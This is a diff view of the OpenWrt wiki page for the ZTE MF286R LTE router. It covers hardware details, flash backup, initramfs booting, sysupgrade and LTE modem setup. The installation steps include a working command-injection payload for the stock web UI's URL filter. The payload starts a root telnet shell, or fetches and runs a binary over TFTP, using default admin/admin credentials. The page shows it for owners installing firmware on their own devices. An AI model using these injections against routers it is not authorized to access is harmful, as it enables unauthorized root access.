Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision		 Previous revision
toh:zte:mf286r [2022/09/09 10:44] – oops pcislockedtoh:zte:mf286r [2024/11/04 10:22] (current) – [Basic configuration] andrewz
Line 5: Line 5:
 /* USE https://openwrt.org/meta/create_new_device_page */ /* USE https://openwrt.org/meta/create_new_device_page */
  
-{{page>meta:infobox:construction&noheader&nofooter&noeditbtn}}+ZTE MF286R is a wireless LTE router, capable of connecting to LTE networks at download speeds up to 300Mbps using carrier aggegation. It has 3x3 2.4GHz Wi-Fi 4 and 2x2 5GHz Wi-Fi 5 Wave 2 radios, four gigabit ethernet ports, one USB 2.0 port, two RJ-11 ports for connecting landline phones that lets you use the cellular network to make calls. It is commonly used by some European ISPs for FWA(Fixed Wireless Access) services, such as Windtre on Italy, Turkcell on Türkiye, and more. Some models of the MF286 family include battery or phone ports, as well as corresponding LEDs on the front.
  
-ZTE MF286 is a wireless LTE router, capable of connecting to LTE networks at 300Mbps using carrier aggegation. It has tri-band 2.4GHz Wi-Fi 4 and dual-band 5GHz Wi-Fi 5 Wave 2 radios, four gigabit ethernet ports, one USB 2.0 port, two RJ-11 ports for connecting landline phones that lets you use the cellular network to make calls, and a battery slot on the back for a 3Ah battery. It is commonly used by some european ISPs for FWA(Fixed Wireless Access) services, by Windtre on Italy, Turkcell on Turkey, and more. Some models do not include battery or phone ports, as well as corresponding LEDs on the front. +{{media:zte:mf286r:mf286r-all-angles.jpg?512|ZTE MF286R from all angles.}}
- +
-{{media:zte:mf286r-all-angles.jpg?512|ZTE MF286R from all angles.}} +
- +
-<WRAP BOX> +
-FIXME +
-===== Getting started with a new Device Page ===== +
-  - This is an empty template that suggests the information that should be present on a well-constructed Device Page. This means, that **you have to fill it with life and information.** +
-  - There are several "fixme" tags with text on a light background (like this text) throughout this template. As you fill in the page, remove those tags so that people can judge its completeness. +
-  - When there are no more "fixme" tags left, delete this one too, along with the ''<nowiki><WRAP></nowiki>'' that encloses it. +
- +
-===== Keep the articles modular ===== +
-  * Please include only model specific information, omit bla,bla and put everything generic into separate articles +
-  * If you have no time to write certain stuff, link to [[docs:start]] +
-  * [[docs:guide-user:base-system:start]] should lead the way, do not explain this again +
-  * DO NOT provide a complete howto here! Instead //groom// the [[docs:start|general documentation]]. +
-</WRAP>+
  
 ===== Supported Versions ===== ===== Supported Versions =====
- +<!-- ToH: { 
- +  "source""json", 
----- datatable ---- +  "dom": "t", 
-cols    BrandModelVersionsSupported Current Rel, OEM device homepage URL_url, Forum Search_search-forums, Device Techdata_pageid +  "paging": false
-headers BrandModel, Version, Current Release, OEM Info, Forum Search, Technical Data +  "rotate"true
-align   c,c,c,c,c,c,c +  "shownColumns"["brand""model""version""supportedcurrentrel""oemdevicehomepageurl""forumsearch", "deviceid"]
-filter  : Brand=ZTE +  "filterColumns"{"brand": "^ZTE$", "model""^MF286R$"} 
-filter  Model=MF286R +-->
-----+
  
 /* If no unsupported functions known, comment out the following datatable or delete it. */ /* If no unsupported functions known, comment out the following datatable or delete it. */
----- datatable ---- +<!-- ToH: { 
-cols    Unsupported Functions_unsupporteds +  "source""json", 
-filter  : Brand=ZTE +  "dom""t", 
-filter  : Model=MF286R +  "paging"false, 
-----+  "shownColumns": ["unsupported_functions"], 
 +  "filterColumns": {"brand": "^ZTE$", "model": "^MF286R$"} 
 +-->
  
 ===== Experimental Versions ===== ===== Experimental Versions =====
- 
  
 //None at this time.// //None at this time.//
  
 ===== Hardware Highlights ===== ===== Hardware Highlights =====
----- datatable ---- +<!-- ToH: { 
-cols    ModelVersionsCPUCPU MHzCPU Cores_numcores, Flash MB_mbflashs, RAM MB_mbram, WLAN Hardware, WLAN 2.4GHz, WLAN 5.0GHz, Ethernet 100M ports_, Ethernet Gbit ports_, Modem, USB ports_ +  "source""json", 
-header  : ModelVersion,SoC,CPU MHz,CPU Cores,Flash MB,RAM MB,WLAN Hardware,WLAN2.4,WLAN5.0,100M ports,Gbit ports,Modem,USB +  "dom": "t", 
-align   : c,c,c,c,c,c,c,c,c,c,c,c,c +  "paging": false, 
-filter  : Brand=ZTE +  "rotate": true
-filter  Model=MF286R +  "shownColumns"["model""version""cpu""cpumhz""cpucores""flashmb""rammb""wlanhardware""wlan24ghz""wlan50ghz""ethernet100mports""ethernet1gports""modem""usbports"]
----- +  "filterColumns"{"brand": "^ZTE$", "model""^MF286R$"} 
 +-->
  
 ===== Installation ===== ===== Installation =====
----- datatable ---- +<!-- ToH: { 
-cols    ModelVersionsSupported Current RelFirmware OpenWrt Install URL_url, Firmware OpenWrt Upgrade URL_urlFirmware OEM Stock URL_url +  "source""json", 
-headers ModelVersionCurrent ReleaseFirmware OpenWrt InstallFirmware OpenWrt UpgradeFirmware OEM Stock +  "dom": "t", 
-align   : c,c,c +  "paging": false, 
-filter  : Brand=ZTE +  "rotate": true
-filter  Model=MF286R +  "shownColumns"["model""version""supportedcurrentrel""firmwareopenwrtinstallurl""firmwareopenwrtupgradeurl""firmwareoemstockurl"]
-----+  "filterColumns"{"brand": "^ZTE$", "model""^MF286R$"} 
 +-->
  
 -> [[docs:guide-user:installation:generic.flashing|Install OpenWrt (generic explanation)]] -> [[docs:guide-user:installation:generic.flashing|Install OpenWrt (generic explanation)]]
  
-FIXME Please add the installation procedure here.+TL:DR; Get a serial adapter and connect to the serial(see [[:toh:zte:mf286r#serial|Serial]]), boot the initramfs image, then apply the sysupgrade image.  
 +If you don't have a serial adapter, you can use the known exploit to gain a root shell and move from there
  
-==== Flash Layout ==== 
-<WRAP BOX> 
-FIXME //[[:docs:techref:flash.layout#discovery_how_to_find_out|Find out flash layout]], then add the flash layout table here (copy, paste, modify the [[docs:techref:flash.layout#partitioning_of_the_flash|example]]).// 
  
-Please check out the article [[docs:techref:flash.layout|Flash layout]]. It contains examples and explanations that describe how to document the flash layout. +====STEP 1Gaining root shell====
-</WRAP>+
  
 +===Method 1===
 +Use a serial cable. It might seem inconvenient to tear apart the device and get a serial adapter for one job but it is way easier to do the install with it. Otherwise, feel free to follow the other methods mentioned below, which takes advantage of an URL RCE exploit within the Web UI. Some up-to-date firmwares patched this bug(such as T-Mobile.pl firmware.). Physical connections for serial are shown [[:toh:zte:mf286r#serial|here.]]
  
-==== OEM installation using the TFTP method ====+===Method 2=== 
 +This works if busybox has telnetd compiled in the binary. If this does not work, try method 3..
  
-->  [[docs:guide-user:installation:generic.flashing.tftp]]+Using well-known exploit to start telnetd on your router - works only if Busybox on stock firmware has telnetd included: 
 +Open stock firmware web interface 
 +- Navigate to "URL filtering" section by going to "Advanced settings", then "Firewall" and finally "URL filter"
 +- Add an entry ending with <nowiki>"&&telnetd&&"</nowiki>, for example <nowiki>"http://hostname/&&telnetd&&".</nowiki> 
 +- telnetd will immediately listen on port 4719. 
 +- After connecting to telnetd use "admin/admin" as credentials.
  
-=== Specific values needed for tftp ===+===Method 3=== 
 +This works if busybox does not have telnetd compiled in. Notably, this is the case in DNA.fi firmware.
  
-<WRAP BOX>+- Set IP of your computer to 192.168.0.22/24. 
 +- Have a TFTP server running at that address 
 +- Download MIPS build of busybox including telnetd, for example from [[https://busybox.net/downloads/binaries/1.16.1/busybox-mips|here]] and put it in it's root directory. Rename it as "telnetd"
 +- As previously, login to router's web UI and navigate to "URL filtering" 
 +- Using "Inspect" feature, extend "maxlength" property of the input field named "addURLFilter", so it looks like this: 
 +<nowiki <input type="text" name="addURLFilter" id="addURLFilter" maxlength="332" class="required form-control"></nowiki> 
 +- Stay on the page - do not navigate anywhere 
 +- Enter <nowiki>"http://aa&zte_debug.sh 192.168.0.22 telnetd"</nowiki> as a filter. 
 +- Save the settings. This will download the telnetd binary over tftp and execute it. You should be able to log in at port 23, using "admin/admin" as credentials.
  
-FIXME Enter values for "FILL-IN" below+====STEP 2: Backing up original software==== 
 +As the stock firmware may be customized by the carrier and is not officially available in the Internet, **IT IS IMPERATIVE** to back up the stock firmware, if you ever plan to returning to stock firmware. It is highly recommended to perform backup using both methods, to avoid hassle of reassembling firmware images in future, if a restore is needed.
  
-^ Bootloader tftp server IPv4 address  | FILL-IN   | +===Method 1 After booting OpenWrt initramfs image via TFTP=== 
-^ Bootloader MAC address (special)     | FILL-IN   | +PLEASE NOTE: YOU CANNOT DO THIS IF USING INTERMEDIATE FIRMWARE FOR INSTALLATION. 
-^ Firmware tftp image                  | [[:downloads|Latest OpenWrt release]] (**''NOTE:''** Name must contain //"tftp"//) | +Dump stock firmware located on stock kernel and ubi partitions and keep them in a safe place, should a restore be needed in future.
-^ TFTP transfer window                 | FILL-IN seconds                                | +
-^ TFTP window start                    | approximately FILL-IN seconds after power on   | +
-^ TFTP client required IP address      | FILL-IN                                        |+
  
 +  ssh root@192.168.1.1: cat /dev/mtd4 > mtd4_kernel.bin
 +  ssh root@192.168.1.1: cat /dev/mtd9 > mtd9_ubi.bin
 +
 +===Method 2 - using stock firmware===
 +- After booting into the stock frimware and connecting to the console either via serial or telnet, Connect an external USB drive formatted with FAT or ext4 to the USB port.
 +- The drive will be auto-mounted to /var/usb_disk
 +- Check the flash layout of the device:
 +
 +<WRAP BOX>
 +  cat /proc/mtd
 </WRAP> </WRAP>
  
-===== Upgrading OpenWrt ===== +It should show the following:
-->  [[docs:guide-user:installation:generic.sysupgrade]]+
  
 +  mtd0: 000a0000 00010000 "u-boot"
 +  mtd1: 00020000 00010000 "u-boot-env"
 +  mtd2: 00140000 00010000 "reserved1"
 +  mtd3: 000a0000 00020000 "fota-flag"
 +  mtd4: 00080000 00020000 "art"
 +  mtd5: 00080000 00020000 "mac"
 +  mtd6: 000c0000 00020000 "reserved2"
 +  mtd7: 00400000 00020000 "cfg-param"
 +  mtd8: 00400000 00020000 "log"
 +  mtd9: 000a0000 00020000 "oops"
 +  mtd10: 00500000 00020000 "reserved3"
 +  mtd11: 00800000 00020000 "web"
 +  mtd12: 00300000 00020000 "kernel"
 +  mtd13: 01a00000 00020000 "rootfs"
 +  mtd14: 01900000 00020000 "data"
 +  mtd15: 03200000 00020000 "fota"
 +  mtd16: 01d00000 00020000 "firmware"
 +
 +
 +//Differences might indicate that this is NOT a MF286A device but one of other variants.//
 +- Copy over all MTD partitions, for example by executing the following:
 +
 +  for i in 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15; do cat /dev/mtd$i > \
 +  /var/usb_disk/mtd$i; done
 +
 +"Firmware" partition(mtf16) can be skipped, it is a concatenation of "kernel" and "rootfs".
 +
 +- If the count of MTD partitions is different, this might indicate that this is not a MF286R device, but one of its other variants.
 +- Unmount the filesystem  and then remove the drive:
 +
 +  umount /var/usb_disk; sync
 +  
 +- Store the files in safe place if you ever plan to return to stock firmware. **This is especially important, because stock firmware for this device is not available officially, and is usually customized by the mobile providers.**
 +
 +
 +Alternatively, you can use the TFTP server you are already going to use for the openwrt initramfs image, as a storage for the MTD dumps, by using something similar to: (Thanks to cicibird at discord for this tip)
 +
 +  tftp -l /dev/mtd0ro -r mtd0ro_uboot.img -p 192.168.1.144
 +  tftp -l /dev/mtd1ro -r mtd1ro_uenv.img -p 192.168.1.144
 +  tftp -l /dev/mtd2ro -r mtd2ro_reseved1.img -p 192.168.1.144
 +  tftp -l /dev/mtd3ro -r mtd3ro_foto-flag.img -p 192.168.1.144
 +  tftp -l /dev/mtd4ro -r mtd4ro_art.img -p 192.168.1.144
 +  tftp -l /dev/mtd5ro -r mtd5ro_mac.img -p 192.168.1.144
 +  tftp -l /dev/mtd6ro -r mtd6ro_reserved2.img -p 192.168.1.144
 +  tftp -l /dev/mtd7ro -r mtd7ro_cfg-param.img -p 192.168.1.144
 +  tftp -l /dev/mtd8ro -r mtd8ro_log.img -p 192.168.1.144
 +  tftp -l /dev/mtd9ro -r mtd9ro_oops.img -p 192.168.1.144
 +  tftp -l /dev/mtd10ro -r mtd10ro_reserved3.img -p 192.168.1.144
 +  tftp -l /dev/mtd11ro -r mtd11ro_web.img -p 192.168.1.144
 +  tftp -l /dev/mtd12ro -r mtd12ro_kernel.img -p 192.168.1.144
 +  tftp -l /dev/mtd13ro -r mtd13ro_rootfs.img -p 192.168.1.144
 +  tftp -l /dev/mtd14ro -r mtd14ro_data.img -p 192.168.1.144
 +  tftp -l /dev/mtd15ro -r mtd15ro_foto.img -p 192.168.1.144
 +  tftp -l /dev/mtd16ro -r mtd16ro_frimware.img -p 192.168.1.144
 +
 +Change the IP accordingly, of course.
 +
 +====STEP 3: Booting initramfs image====
 +
 +===Method 1: using serial console (RECOMMENDED):===
 +- Have TFTP server running, exposing the OpenWrt initramfs image, and set your computer's IP address as 192.168.0.22 (/24, subnet mask 255.255.255.0). This is the default expected by U-boot. You may wish to change that, and alter later commands accordingly.
 +- Connect the serial console if you haven't done so already,
 +- Interrupt boot sequence by pressing any key in U-boot when prompted "Hit any key to stop autoboot". You might need to power cycle the device to get the prompt again.
 +- Use the following commands to boot OpenWrt initramfs through TFTP:
 +  setenv serverip 192.168.0.22
 +  setenv ipaddr 192.168.0.1
 +  tftpboot 0x82000000 openwrt-ath79-nand-zte_mf286a-initramfs-kernel.bin
 +  bootm 0x82000000
 +
 +(Replace server IP and router IP as needed). 
 +
 +There is no  emergency TFTP boot sequence triggered by buttons, contrary to MF283+.
 +- When OpenWrt initramfs finishes booting, proceed to actual installation.
 +
 +===Method 2: using initramfs image as temporary boot kernel===
 +This exploits the fact, that kernel and rootfs MTD devices are consecutive on NAND flash, so from within stock image, an initramfs can be written to this area and booted by U-boot on next reboot, because it uses "nboot" command which isn't limited by kernel partition size.
 +- Download the initramfs-kernel.bin image
 +- After backing up the previous MTD contents, write the images to the "firmware" MTD device, which conveniently concatenates "kernel" and "rootfs" partitions that can fit the initramfs image:
 +
 +  nandwrite -p /dev/<firmware-mtd> \
 +  /var/usb_disk/openwrt-ath79-zte_mf286a-initramfs-kernel.bin
 +
 +- If the write fails with "Permission denied", then the flash can be unlocked using this hidden command:
 +
 +  cat /proc/driver/sensor_id
 +  
 +Retry the write afterwards.
 +
 +- If write is OK, reboot the device, it will reboot to OpenWrt initramfs:
 +
 +  reboot -f
 +
 +- After rebooting, SSH into the device and use sysupgrade to perform proper installation.
 +
 +===Method 3: using built-in TFTP recovery (LAST RESORT)===
 +- With that method, ensure you have complete backup of system's NAND flash first. It involves deliberately erasing the kernel.
 +- Download "-initramfs-kernel.bin" image for the device.
 +- Prepare the recovery image by prepending 8MB of zeroes to the image, and name it root_uImage:
 +
 +  dd if=/dev/zero of=padding.bin bs=8M count=1
 +
 +  cat padding.bin openwrt-ath79-nand-zte_mf286a-initramfs-kernel.bin >
 +  root_uImage
 +
 +- Set up a TFTP server at 192.0.0.1/8. Router will use random address from that range.
 +- Put the previously generated "root_uImage" into TFTP server root directory.
 +- Deliberately erase "kernel" partition" using stock firmware after taking backup.
 +  
 +  flash_erase /dev/mtd12
 +  
 +- If the erase fails with "Permission denied", then the flash can be unlocked using this hidden command:
 +
 +  cat /proc/driver/sensor_id
 +
 +Retry erasing afterwards.
 +  
 +Replace mtd12 with kernel partition if differrent. **THIS IS POINT OF NO RETURN.**
 +
 +- Restart the device. U-boot will attempt flashing the recovery initramfs image, which will let you perform actual installation using sysupgrade. This might take a considerable time, sometimes the router doesn't establish Ethernet link properly right after booting. **Be patient.**
 +- After U-boot finishes flashing, the LEDs of switch ports will all light up. At this moment, perform power-on reset, and wait for OpenWrt initramfs to finish booting. Then proceed to actual installation.
 +
 +====STEP 4: Actual installation====
 +- Set your computer IP to 192.168.1.22/24
 +- scp the sysupgrade image to the device:
 +
 +  scp openwrt-ath79-nand-zte_mf286a-squashfs-sysupgrade.bin \
 +  root@192.168.1.1:/tmp/
 +
 +- ssh into the device and execute sysupgrade:
 +
 +  sysupgrade -n /tmp/openwrt-ath79-nand-zte_mf286a-squashfs-sysupgrade.bin
 +
 +- Wait for router to reboot to full OpenWrt.
 +
 +==== Flash Layout ====
 <WRAP BOX> <WRAP BOX>
 +  mtd0: 000a0000 00010000 "u-boot"
 +  mtd1: 00020000 00010000 "u-boot-env"
 +  mtd2: 00140000 00010000 "reserved1"
 +  mtd3: 000a0000 00020000 "fota-flag"
 +  mtd4: 00080000 00020000 "art"
 +  mtd5: 00080000 00020000 "mac"
 +  mtd6: 000c0000 00020000 "reserved2"
 +  mtd7: 00400000 00020000 "cfg-param"
 +  mtd8: 00400000 00020000 "log"
 +  mtd9: 000a0000 00020000 "oops"
 +  mtd10: 00500000 00020000 "reserved3"
 +  mtd11: 00800000 00020000 "web"
 +  mtd12: 00300000 00020000 "kernel"
 +  mtd13: 01a00000 00020000 "rootfs"
 +  mtd14: 01900000 00020000 "data"
 +  mtd15: 03200000 00020000 "fota"
 +  mtd16: 01d00000 00020000 "firmware"
 +</WRAP>
  
-FIXME These are generic instructions. Update with your router's specifics.+ 
 +===== Upgrading OpenWrt ===== 
 +->  [[docs:guide-user:installation:generic.sysupgrade]]
  
 ==== LuCI Web Upgrade Process ==== ==== LuCI Web Upgrade Process ====
Line 114: Line 275:
  
 If you don't have a GUI (LuCI) available, you can alternatively upgrade via the command line. If you don't have a GUI (LuCI) available, you can alternatively upgrade via the command line.
-There are two command line methods for upgrading: +Login as root via SSH on 192.168.1.1, or connect via serial, then enter the following commands, replacing the URL and filename with the latest sysupgrade image link.
- +
-  * ''sysupgrade'' +
-  * ''mtd'' +
- +
-Note: It is important that you put the firmware image into the ramdisk (/tmp) before you start flashing. +
- +
-=== sysupgrade === +
- +
-  * Login as root via SSH on 192.168.1.1, then enter the following commands:+
  
 <code> <code>
Line 129: Line 281:
 wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc
 sysupgrade /tmp/xxx.abc sysupgrade /tmp/xxx.abc
-</code> 
- 
-=== mtd === 
- 
-If ''sysupgrade'' does not support this router, use ''mtd''. 
- 
-  * Login as root via SSH on 192.168.1.1, then enter the following commands: 
- 
-<code> 
-cd /tmp 
-wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc 
-mtd write /tmp/xxx.abc linux && reboot 
 </code> </code>
  
Line 146: Line 286:
  
 ===== Debricking ===== ===== Debricking =====
--> [[docs:guide-user:troubleshooting:generic.debrick]]+See [[docs:guide-user:troubleshooting:generic.debrick]]
  
 ===== Failsafe mode ===== ===== Failsafe mode =====
--> [[docs:guide-user:troubleshooting:failsafe_and_factory_reset]]+See [[docs:guide-user:troubleshooting:failsafe_and_factory_reset]]
  
 ===== Basic configuration ===== ===== Basic configuration =====
--> [[docs:guide-user:base-system:start|Basic configuration]] After flashing, proceed with this.\\ +Since the router is equipped with LTE modem as its main WAN interface, it might be useful to connect to the Internet right away after installation. To do so over Luci, you'd need to connect to Internet via other means (Ethernet or Wi-Fi STA) and then install ''luci-proto-ncm'' package
-Set up your Internet connection, configure wireless, configure USB port, etc.+
  
-===== Specific Configuration =====+You can also add the necessary packages when building a new image with [[https://firmware-selector.openwrt.org/|Firmware Selector]] or download the package as well as its missing dependencies after installation via OpenWrt's website, upload them to the router and install them manually, which doesn't require the router to be connected to Internet. 
 +As of this writing, the package and its dependencies can be found from the following page (check and update the version accordingly): 
 +  * https://downloads.openwrt.org/releases/23.05.5/packages/mips_24kc/luci/ 
 +  * https://downloads.openwrt.org/releases/23.05.5/targets/ath79/nand/packages/ 
 +  * https://downloads.openwrt.org/releases/23.05.5/packages/mips_24kc/base/
  
-<WRAP BOX> +If you can't access the Internet via other means or you want to set it up via console or SSH, you can put the following entries in ''/etc/config/network''replacing the specific APN with one needed for your ISP.
-FIXME Please fill in real values for this devicethen remove the EXAMPLEs+
  
-==== Network interfaces ==== +<code> 
-The default network configuration is: +config interface 'wwan' 
-^ Interface Name   ^ Description                  ^ Default configuration    ^ +        option proto 'ncm' 
-| br-lan           | EXAMPLE LAN & WiFi           | EXAMPLE 192.168.1.1/24   | +        option device '/dev/ttyACM0' 
-| vlan0 (eth0.0)   | EXAMPLE LAN ports (1 to 4)   | EXAMPLE None             | +        option pdptype 'IP' 
-| vlan1 (eth0.1)   | EXAMPLE WAN port             | EXAMPLE DHCP             | +        option apn 'internet' 
-| wl0              | EXAMPLE WiFi                 | EXAMPLE Disabled         |+</code>
  
-</WRAP>+Please refer to [[:docs:guide-user:network:wan:wwan:ethernetoverusb_ncm#network_configuration|NCM modem configuration]] for further details. 
 +  
 +After configuring your LTE modem, you can follow [[docs:guide-user:base-system:start|Basic configuration]] to proceed with other configuration steps, such as [[:docs:guide-user:network:wifi:start|setting up your Wi-Fi]]. 
 + 
 +===== Specific Configuration ===== 
 + 
 +Other than LTE modem configuration mentioned above, no specific configuration is required. You might want to install <nowiki>luci-app-smstool, sms-tool and modemband</nowikiin order to manage LTE bands, send/receive SMS and use USSD codes.
  
 ==== Switch Ports (for VLANs) ==== ==== Switch Ports (for VLANs) ====
Line 202: Line 350:
 ===== Hardware ===== ===== Hardware =====
 ==== Info ==== ==== Info ====
----- datatemplatelist dttpllist ---- +<!-- ToH: { 
-templatemeta:template_datatemplatelist +  "source""json", 
-cols    BrandModelVersionsDevice TypeAvailabilitySupported Since Commit_gitSupported since RelSupported current RelUnsupportedBootloaderCPUTargetCPU MHzFlash MBsRAM MBSwitchEthernet 100M ports_Ethernet Gbit ports_Comments network ports_ModemVLANWLAN 2.4GHzWLAN 5.0GHzWLAN HardwaresWLAN Comments_Detachable Antennas_USB ports_SATA ports_Comments USB SATA ports_SerialJTAGLED countButton countPower supplyDevice Techdata_pageidForum topic URL_urlwikidevi URL_urlOEM Device Homepage URL_urlFirmware OEM Stock URL_urlFirmware OpenWrt Install URL_urlFirmware OpenWrt Upgrade URL_urlComments_ +  "dom""t", 
-filter  : Brand=ZTE +  "paging"false, 
-filter  Model=MF286R +  "rotate": true, 
-----+  "shownColumns": ["brand""model""version""devicetype""availability""supportedsincecommit""supportedsincerel""supportedcurrentrel""unsupported_functions""bootloader""cpu""target""cpumhz""flashmb""rammb""switch""ethernet100mports""ethernet1gports""commentsnetworkports""modem""vlan""wlan24ghz""wlan50ghz""wlanhardware""wlancomments""detachableantennas""usbports""sataports""commentsusbsataports""serial""jtag""ledcount""buttoncount""powersupply""deviceid""owrt_forum_topic_url""wikideviurl""oemdevicehomepageurl""firmwareoemstockurl", "firmwareopenwrtinstallurl", "firmwareopenwrtupgradeurl", "comments"]
 +  "filterColumns": {"brand""^ZTE$", "model""^MF286R$"} 
 +-->
  
 ==== Photos ==== ==== Photos ====
-/* =====>>>>> Standard size for photos: add ?400 to the medialink                                */ 
-/* When uploading photos, **name them** intelligently. Nobody knows what 20100930_000602.jpg is! */ 
-/* e.g. {{:media:yourbrand:yourbrand_yourmodel_front.jpg?400|}}                                  */ 
-/* Thanks, your wiki administration - Oct. 2015 */ 
  
 //Front://\\ //Front://\\
-**Insert photo of front of the casing**+{{media:zte:mf286r:mf286r-superbox-front.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-1.jpg?400|}}
  
 //Back://\\ //Back://\\
-**Insert photo of back of the casing**+{{media:zte:mf286r:mf286r-superbox-back.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-2.jpg?400|}}
  
-//Backside label://\\ +//Top://\\ 
-**Insert photo of backside label**+{{:media:zte:mf286d:mf286d-3.jpg?400|}} 
 + 
 +//Right://\\ 
 +{{:media:zte:mf286d:mf286d-4.jpg?400|}} 
 + 
 +//Under device label://\\ 
 +{{:media:zte:mf286d:mf286d-5.jpg?400|}} 
 + 
 +//Disassembled case://\\ 
 +{{:media:zte:mf286d:mf286d-6.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-7.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-8.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-9.jpg?400|}}
  
 ==== Opening the case ==== ==== Opening the case ====
Line 228: Line 388:
 **Note:** This will void your warranty! **Note:** This will void your warranty!
  
-<WRAP BOX> +  - Take of battery lid (no battery support for this modelbattery cage is dummy). 
-FIXME //Describe what needs to be done to open the devicee.gremove rubber feet, adhesive labels, screws...// +  - Unscrew screw placed behind battery lid. 
-  * To remove the cover and open the device, do a/b/c +  - Take off back cover. It attached with multiple plastic clamps. 
-</WRAP>+  - Unscrew four more screws hidden behind back case. 
 +  - Remove front panel from blue chassisThere are more plastic 
 +   clamps
 +  - Unscrew two boards, which secures the PCB in the chassis. 
 +  - Extract board from blue chassis.
  
 //Main PCB://\\ //Main PCB://\\
-**Insert photo of PCB**+{{:media:zte:mf286d:mf286d-10.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-11.jpg?400|}} 
 + 
 +//PCB Board Details and modem photo://\\ 
 +{{:media:zte:mf286d:mf286d-12.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-13.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-14.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-15.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-16.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-17.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-18.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-19.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-20.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-21.jpg?400|}} 
 +{{:media:zte:mf286d:mf286d-22.jpg?400|}}
  
 ==== Serial ==== ==== Serial ====
Line 1607: Line 1785:
 </WRAP>\\ </WRAP>\\
  
-===== Notes ===== 
-//Space for additional notes, links to forum threads or other resources.// 
- 
-  * ... 
 ===== Quirks and known issues ===== ===== Quirks and known issues =====
 - It was observed, that CH340-based USB-UART converters output garbage during U-boot phase of system boot. At least CP2102 is known to work properly. - It was observed, that CH340-based USB-UART converters output garbage during U-boot phase of system boot. At least CP2102 is known to work properly.
Line 1629: Line 1803:
 ===== Tags ===== ===== Tags =====
 <WRAP BOX> <WRAP BOX>
-FIXME //Add tags below, then remove this fixme.//+FIXME //Add tags below, then remove this fixme. I don't know which tags are applicable, so pls help thx.//
 </WRAP> </WRAP>
  
 [[meta:tags|How to add tags]] [[meta:tags|How to add tags]]
 {{tag>EXAMPLETAG}} {{tag>EXAMPLETAG}}
  • Last modified: 2022/09/09 10:44
  • by pcislocked